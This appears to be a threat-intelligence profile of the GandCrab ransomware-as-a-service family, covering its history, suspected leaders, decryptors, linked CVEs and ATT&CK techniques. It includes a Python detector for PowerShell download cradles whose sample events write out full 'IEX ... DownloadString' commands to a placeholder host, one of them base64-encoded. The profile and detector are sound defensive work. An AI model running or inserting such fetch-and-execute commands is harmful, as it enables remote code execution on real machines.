GandCrab
GandCrab is a ransomware family operated as a ransomware-as-a-service (RaaS) platform. It was first advertised and launched in early 2018 and primarily spread through spam emails containing malicious attachments. Reporting also links some 2019 distribution activity to hijacked or abused GoDaddy-registered domains, and GandCrab has been observed delivered by other malware such as FormBook and by Storm-0324 payload chains. Europol-supported investigations state that GandCrab had more than one million victims worldwide, and the operators claimed the operation generated over $2 billion before they voluntarily shut it down in May 2019.
The malware encrypts victim files and extorts payment for decryption. The source material also links GandCrab to reflective DLL loading, a technique that loads a library directly into process memory without going through the standard Windows loader APIs. A 2026 network-forensics paper cited in the source material analyzed GandCrab and Ryuk packet behavior to derive suspicious and malicious packet signatures for earlier detection.
GandCrab is consistently described as the predecessor to REvil/Sodinokibi, with multiple reports stating that REvil emerged in 2019 as its successor and that some GandCrab affiliates moved to REvil. German authorities and other reporting identify Daniil Maksimovich Shchukin (alias UNKN/UNKNOWN) as a suspected leader of GandCrab and later REvil, and Anatoly Sergeevitsch Kravchuk as a suspected developer/operator. Since 2018, Europol has supported a Romanian-led investigation into GandCrab; joint law-enforcement efforts produced decryptors for versions V1, V4, and V5 through V5.2, released via No More Ransom, reportedly enabling more than 49,000 system decryptions and preventing over €60 million in ransom losses.
High-confidence associations in the content include use against businesses and organizations globally, distribution by spam-email campaigns, and historical delivery by Storm-0324. Indicators and related artifacts are limited in the source material; one article ties GandCrab campaigns in February 2019 to the same kinds of abused domains previously used in bomb-threat spam campaigns.
Vulnerabilities exploited
1 CVE Mallory has correlated with this family across public research and vendor advisories.
Atlassian Confluence Server and Data Center Widget Connector is vulnerable to a server-side template injection attack... Multiple malware campaigns have taken advantage of this vulnerability; the most notable being GandCrab ransomware.
Groups observed using it
2 distinct threat actors attributed by public researchers.
Storm-0324 has distributed a range of first-stage payloads since at least 2016, including: ... GandCrab ransomware
“…the operators of Gandcrab, GOLD GARDEN, retired and sold their operation to an affiliate group we now call GOLD SOUTHFIELD.”
Techniques & procedures
16 distinct techniques documented for this family, organized by ATT&CK tactic.
Resource Development
1 technique
In January 2019, it was reported that some domains that were registered at GoDaddy had been sending ransom bomb threats... These messages appeared to be from domains owned by legitimate, well-known brands. The group... was exploiting a vulnerability in GoDaddy’s DNS setup platform... They would then use the automated service to send mail from dormant domains.
Initial Access
3 techniques
The Gandcrab ransomware affiliate program first surfaced in January 2018, and paid enterprising hackers huge shares of the profits just for hacking into user accounts at major corporations.
A remote attacker is able to exploit a server-side request forgery (SSRF) vulnerability in the WebDAV plugin to send arbitrary HTTP and WebDAV requests from a Confluence Server or Data Center instance.
These messages appeared to be from domains owned by legitimate, well-known brands... They would then use the automated service to send mail from dormant domains.
Execution
3 techniques
A primary suspect for malicious code download and in-memory execution in the recent period is PowerShell... PowerShell is launched with the Invoke-Expression cmdlet evaluating code downloaded from a Pastebin web page using the Net.WebClient.DownloadString function, which downloads a web page as a string and stores it in memory.
Citrix ADC maintains a vulnerable Perl script (newbm.pl) that, when accessed via HTTP POST request ... allows local operating system (OS) commands to execute. Attackers can use this functionality to upload/execute command and control (C2) software ... and gain unauthorized access to the OS.
First advertised in early 2018, GandCrab initially spread through spam emails containing malicious attachments.
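The PowerShell download-and-evaluate cradle quoted above (Invoke-Expression fed by Net.WebClient.DownloadString) is visible in process-creation telemetry, which makes it a practical detection point. The following is an added example, not code from Mallory or from any of the cited reports: it scans constructed Sysmon-style process-creation records for a PowerShell command line that pairs an evaluator (Invoke-Expression/IEX) with a script-fetching call, and it generalizes slightly beyond the quoted report by also decoding an -EncodedCommand argument (base64 of UTF-16LE script text, a common way the same cradle is hidden from simple string matching). The event schema, field names, and all sample command lines, including the `paste.invalid` URL, are constructed for the example.

```python
"""Flag PowerShell download cradles in process-creation events.

Added example: the dict-based event format below is a constructed
Sysmon-like schema, not Mallory's or any vendor's real telemetry format.
"""
import base64
import binascii
import re
from dataclasses import dataclass, field

# The cradle has two halves. Either half alone is common in benign admin
# scripts; the pair in one command line is what the quoted report describes.
EVALUATOR = re.compile(r"\b(?:Invoke-Expression|IEX)\b", re.IGNORECASE)
FETCHER = re.compile(
    r"Net\.WebClient|DownloadString|DownloadData|Invoke-WebRequest|\bIWR\b"
    r"|Invoke-RestMethod|\bIRM\b",
    re.IGNORECASE,
)
# PowerShell accepts prefix abbreviations of -EncodedCommand; the argument
# is base64 of the script text encoded as UTF-16LE.
ENCODED_ARG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
POWERSHELL_IMAGES = ("powershell.exe", "pwsh.exe")


@dataclass
class Finding:
    pid: int
    reasons: list = field(default_factory=list)
    decoded: str = ""  # plaintext of an -EncodedCommand payload, if any


def decode_encoded_command(cmdline: str) -> str:
    """Return the plaintext of an -EncodedCommand argument, or "" if absent or invalid."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return ""
    try:
        raw = base64.b64decode(m.group(1), validate=True)
    except (binascii.Error, ValueError):
        return ""
    return raw.decode("utf-16-le", errors="ignore")


def analyze_event(event: dict):
    """Return a Finding when the event looks like a download cradle, else None."""
    image = event.get("image", "").lower()
    if not image.endswith(POWERSHELL_IMAGES):
        return None
    cmdline = event.get("cmdline", "")
    finding = Finding(pid=event["pid"])
    decoded = decode_encoded_command(cmdline)
    if decoded:
        finding.decoded = decoded
        finding.reasons.append("encoded-command")
    # Match against both the visible command line and any decoded payload,
    # so the encoded form of the cradle is caught the same way as the plain one.
    text = cmdline + "\n" + decoded
    if EVALUATOR.search(text) and FETCHER.search(text):
        finding.reasons.append("iex-download-cradle")
        return finding
    return None


def scan(events):
    """Run analyze_event over a batch of events and keep the hits, in order."""
    return [f for f in (analyze_event(e) for e in events) if f is not None]


# Constructed sample events (hypothetical; not captured from any real host).
_PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
_ENCODED_SCRIPT = ("Invoke-Expression (New-Object Net.WebClient)"
                   ".DownloadString('https://paste.invalid/raw/PLACEHOLDER')")
_ENCODED_B64 = base64.b64encode(_ENCODED_SCRIPT.encode("utf-16-le")).decode("ascii")
SAMPLE_EVENTS = [
    {"pid": 4120, "image": _PS,
     "cmdline": "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
                ".DownloadString('https://paste.invalid/raw/PLACEHOLDER')\""},
    {"pid": 4188, "image": _PS,
     "cmdline": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\inventory.ps1"},
    {"pid": 4201, "image": _PS,
     "cmdline": "powershell.exe -nop -w hidden -EncodedCommand " + _ENCODED_B64},
    {"pid": 4300, "image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "cmdline": "firefox.exe https://example.com"},
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(hit.pid, hit.reasons, hit.decoded[:60])
```

Running the block reports PIDs 4120 (plain cradle) and 4201 (the same cradle behind -EncodedCommand); the signed inventory script and the browser launch are not flagged. The two-regex design is deliberate: requiring both the evaluator and the fetcher keeps the rule from firing on routine `Invoke-WebRequest` downloads or on `IEX` used with local strings, which is where a single-pattern rule produces most of its noise.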
Persistence
1 technique
Privilege Escalation
1 technique
Stealth
5 techniques
The obfuscation and polymorphic nature of malware make it more difficult for antivirus systems to identify.
The Gandcrab ransomware affiliate program first surfaced in January 2018, and paid enterprising hackers huge shares of the profits just for hacking into user accounts at major corporations.
One popular technique we're seeing at this time is the use of living-off-the-land binaries — or "LoLBins"... LoLBins are used by different actors combined with fileless malware and legitimate cloud services to improve chances of staying undetected within an organisation, usually during post-exploitation attack phases.
Popular malware like Sodinokibi and Gandcrab have used reflective DLL loaders in the past that allow attackers to load a dynamic library into process memory without using the Windows API... the obfuscated Cobalt Strike beacon... gets deobfuscated with a static XOR key and loaded into memory using reflective loading techniques.
Exfiltration
3 techniques
The Gandcrab team would then try to expand that access, often siphoning vast amounts of sensitive and internal documents in the process.
In addition, in some cases, extensive data were also spied on and threatened with the publication of this, unless a ransom was paid.
...pioneered the practice of double extortion — charging victims once for a key needed to unlock hacked systems, and a separate payment in exchange for a promise not to publish stolen data.
Impact
2 techniques
After successfully encrypting a business’ data, REvil affiliates demand large ransoms up to US $70 million in exchange for a decryption key.
The perpetrators demanded large ransom payments in exchange for decrypting and not leaking data.
Recent activity
44 sources tracked across advisories, community write-ups, and news.
Related Articles: ... German authorities identify REvil and GandCrab ransomware bosses ...
Prolific ransomware family first seen in early 2018, responsible for significant global financial damage before being succeeded by REvil/Sodinokibi.
A ransomware family operated as a ransomware-as-a-service platform, primarily distributed through spam emails, used for extortion by encrypting data and withholding decryption, and by threatening to publish stolen data, unless a ransom was paid.
Ransomware operation allegedly run by the actor known as UNKN, active from January 2018 until May 2019 and reported to have collected over $2 billion in ransom payments.